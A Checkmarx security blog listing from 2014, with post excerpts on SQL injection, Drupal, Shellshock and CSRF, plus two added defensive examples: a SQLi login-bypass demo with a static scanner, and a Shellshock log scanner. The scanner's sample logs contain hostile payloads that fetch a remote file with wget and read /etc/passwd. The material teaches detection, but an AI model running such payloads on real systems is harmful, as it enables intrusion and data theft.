Checkmarx Blog


7 Essential Resource Centers to Boost Your InfoSec IQ

Dec 04, 2014 By Sharon Solomon | Many applications today possess critical vulnerabilities – SQL injections (SQLi), Cross Site Scripting (XSS) and Cross Site Request Forgery (CSRF) being just a few of them. The first step in combating these security issues is getting to know how they work and learning about them from real life scenarios. Unfortunately, not all developers today are familiar with the security aspects of software development.

SQL Injection Tutorial: Tackling SQLi with Source Code Analysis

Nov 20, 2014 By Sharon Solomon | The impact of the Drupal fiasco is still being felt across all industry sectors. The world's third biggest CMS platform was compromised with one of the oldest and best-known web attack techniques in existence: the SQL injection (SQLi). While the Drupal 7.32 update has resolved this specific problem, SQL injections won't really go away until they are treated at the root, which is the application code.
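As an added illustration of the point above, that SQL injection is a code defect and that a static analyser finds it by looking at how the query string is built, here is a Python example that is not part of the original post. The in-memory SQLite database, the login functions, the `' OR '1'='1` payload and the snippet scanned by `find_dynamic_sql` are all constructed for this demonstration; the scanner is a deliberately tiny one-hop taint check written for this page, not Checkmarx's engine.

```python
import ast
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database with one user (demo data, not from the post)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn, username, password):
    # The query is assembled by string formatting, so user input becomes SQL syntax.
    query = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def login_safe(conn, username, password):
    # Bound parameters keep the input as data; the driver never parses it as SQL.
    query = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo_injection():
    """Same payload against both versions: it logs in through the first, not the second."""
    conn = make_db()
    payload = "' OR '1'='1"
    return {
        "vulnerable_legit": login_vulnerable(conn, "alice", "s3cret"),
        "vulnerable_injected": login_vulnerable(conn, "alice", payload),
        "safe_legit": login_safe(conn, "alice", "s3cret"),
        "safe_injected": login_safe(conn, "alice", payload),
    }


def find_dynamic_sql(source: str):
    """Toy source-code check in the spirit of a static analyser (hypothetical, for this page).

    Reports the line of every ``.execute(...)`` call whose SQL argument is built
    at run time (``+``, ``%``, ``.format`` or an f-string), following one hop
    through a plain ``name = ...`` assignment. Real analysers track full data
    flow; this only shows the shape of the check.
    """
    tree = ast.parse(source)
    assigned = {}
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and len(node.targets) == 1
                and isinstance(node.targets[0], ast.Name)):
            assigned[node.targets[0].id] = node.value

    def is_dynamic(expr):
        if isinstance(expr, ast.Name):
            expr = assigned.get(expr.id, expr)
        return (
            isinstance(expr, ast.JoinedStr)
            or (isinstance(expr, ast.BinOp) and isinstance(expr.op, (ast.Add, ast.Mod)))
            or (isinstance(expr, ast.Call) and isinstance(expr.func, ast.Attribute)
                and expr.func.attr == "format")
        )

    findings = []
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                and node.func.attr == "execute" and node.args
                and is_dynamic(node.args[0])):
            findings.append(node.lineno)
    return sorted(findings)


# Constructed snippet to scan: line 3 concatenates, line 9 uses an f-string, line 6 is safe.
SAMPLE_SOURCE = '''\
def find_user(conn, name):
    query = "SELECT * FROM users WHERE name = '" + name + "'"
    return conn.execute(query).fetchall()

def find_user_safe(conn, name):
    return conn.execute("SELECT * FROM users WHERE name = ?", (name,)).fetchall()

def find_user_fmt(conn, name):
    return conn.execute(f"SELECT * FROM users WHERE name = '{name}'").fetchall()
'''


def scan_sample():
    return find_dynamic_sql(SAMPLE_SOURCE)


if __name__ == "__main__":
    print(demo_injection())
    print("dynamic SQL at lines:", scan_sample())
```

Running the block logs `alice` in through `login_vulnerable` with the injected payload because the WHERE clause collapses to `... AND password = '' OR '1'='1'`, while `login_safe` rejects the same string; the scanner reports lines 3 and 9 of the sample and stays silent on the parameterised query, which is exactly the split a source-level analyser gives you before the code ever reaches a database.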

The Ultimate List of Open Source Static Code Analysis Security Tools

Nov 13, 2014 By Sarah Vonnegut | Doing security the right way demands an army of developers, security teams, and the tools each of them uses to help create and maintain secure code. With the increasingly important mindset of creating quality, secure code from the start, we've seen a greater shift towards the adoption of tools designed to detect flaws as early as possible in the software development lifecycle (SDLC). One of those tools is static code analysis. The true strength of static source code analysis (SCA, today more commonly called SAST) is in quickly and automatically checking everything "under the hood" without actually executing the code. Because it works to discover issues that can be hard to discover manually, it's a perfect companion to the human eye. Even the most senior security people still miss security flaws. After all, we are still human, so the combination of machine and man makes for better coverage.

Samsung’s ‘Find My Mobile’ CSRF Flaw: A Wake Up Call for Mobile Developers

Nov 06, 2014 By Sharon Solomon | Samsung is currently topping sales charts worldwide with a wide range of Android powered phones catering to virtually all market segments. This mass distribution of mobile devices has magnified the importance of creating secure mobile applications. Unfortunately, a CSRF flaw has been found in one of the South Korean phone manufacturer's proprietary applications.

7 Lessons We Should Take Away from the Drupal SQL Injection Flaw

Nov 04, 2014 By Sarah Vonnegut | What’s the Deal with Drupal?
Another month, another apocalypse-summoning security catastrophe – and October was no different. Just over two weeks ago, the security team behind Drupal's free and open-source CMS released an ominous security advisory that shocked many in the security industry. The advisory, SA-CORE-2014-005, informed users that an SQL injection flaw in Drupal 7 core, present on every Drupal 7 site running a version earlier than 7.32, let unauthenticated attackers run arbitrary SQL against the site's database, with privilege escalation and code execution following from there.

All You Need to Know About Shellshock & What You Can Do About It

Oct 02, 2014 By Sarah Vonnegut | So, what happens when a core component of Mac, Linux and other Unix-based operating systems is found to be highly vulnerable and easily exploitable? 
Last week, we found out: On September 24th, the world was first introduced to a family of bugs in the Bash shell, being referred to both as ‘Shellshock’ and ‘Bashdoor’.
Here’s a breakdown of what the Bash bug is, how it can be exploited, and how you can protect yourself.
Background on Bash & the Bash Bug Being Called Shellshock
Bash (short for Bourne Again Shell) is the command-line shell in which users and scripts type and run commands. It is the default shell on Mac OS X, most Linux distributions and many other UNIX-like systems, and it is present on most servers running Apache, which at the time ran about 51% of the world's web servers.
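Below is an added example, not part of the original post, of the kind of check a practitioner reaches for once a bug like this is public: a small Python scanner that flags Shellshock exploitation attempts in Apache access logs by looking for the `() {` function-definition prefix that a vulnerable Bash parses out of environment variables such as HTTP_USER_AGENT and HTTP_REFERER, which CGI hands straight from the request into the environment. The log lines, IP addresses and request paths are constructed for the example.

```python
import re

# Constructed sample lines in Apache combined log format (not taken from the original post).
# Line 1 carries the payload in the User-Agent, line 3 in the Referer, line 2 is benign.
SAMPLE_LOG = r'''
203.0.113.7 - - [25/Sep/2014:10:15:32 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://203.0.113.9/x -O /tmp/x\""
198.51.100.4 - - [25/Sep/2014:10:16:01 +0000] "GET /index.html HTTP/1.1" 200 3042 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.0.2.11 - - [25/Sep/2014:10:16:45 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :; }; echo; /bin/cat /etc/passwd" "curl/7.37.0"
'''.strip().splitlines()

# Combined log format: ip ident user [time] "method path proto" status bytes "referer" "user-agent".
# Quoted fields may contain backslash-escaped quotes, hence the (?:[^"\\]|\\.)* groups.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# The exported-function prefix Bash looks for at the start of an environment value.
# Whitespace is left loose on purpose: "() {" and "() {" were both seen in the wild.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def find_shellshock_attempts(lines):
    """Return one record per request that carries the Shellshock prefix in a header or path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("path", "referer", "ua"):
            if SHELLSHOCK_RE.search(m.group(field)):
                hits.append({"ip": m.group("ip"), "path": m.group("path"), "field": field})
                break  # one record per request is enough for triage
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']} (payload in {hit['field']})")
```

Against the constructed lines this reports the two requests to `/cgi-bin/` paths and ignores the browser request. The classic local check for the original bug is `env x='() { :;}; echo vulnerable' bash -c "echo test"`: an unpatched Bash prints `vulnerable` before `test`, a patched one prints only `test`. On a real server, feed the whole access log through the scanner and treat any hit against a CGI path as a probe that may have succeeded until the Bash version is confirmed patched.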

Major Android Browser Flaw Allowing Hackers to Bypass SOP Mechanism

Sep 30, 2014 By Sharon Solomon | The Android platform has taken the world by storm in recent years. It was announced at Google’s recent 2014 I/O developer conference that over 538 million Android devices are currently in use worldwide. Android has now leapfrogged Apple’s iOS in the US, where it currently has almost 52% of the smartphone market share.

Risks and Rewards in Security: An Interview with Josh Sokol, InfoSec Program Owner and Creator of SimpleRisk

Sep 23, 2014 By Sarah Vonnegut | When you’re in the midst of a security issue, getting to the point of feeling on top of security again can seem a million miles away. Because in the end, security is about being aware of what’s going on in your environment and having a proactive approach to dealing with the threats. Being able to prioritize the severity of those threats and vulnerabilities that could impact the business is key to any security practitioner’s job. It’s in that vein that we recently spoke with Josh Sokol, an OWASP leader and the creator of SimpleRisk, an open source risk management tool he released to the community to help take some of the ‘obscurity’ out of security. With a background in computer science, a deep understanding of OWASP principles and as the owner of a security program at a large company, Sokol has a lot of great advice on how to do application security as well as security in general.


Get a Checkmarx Free Demo Now

Interested in trying CxSAST on your own code? You can now use Checkmarx's solution to scan uncompiled / unbuilt source code in 18 coding and scripting languages and identify the vulnerable lines of code. CxSAST will even find the best-fix locations for you and suggest the best remediation techniques. Sign up for your FREE trial now.

Checkmarx is now offering you the opportunity to see how CxSAST identifies application-layer vulnerabilities in real-time. Our in-house security experts will run the scan and demonstrate how the solution's queries can be tweaked as per your specific needs and requirements. Fill in your details and we'll schedule a FREE live demo with you.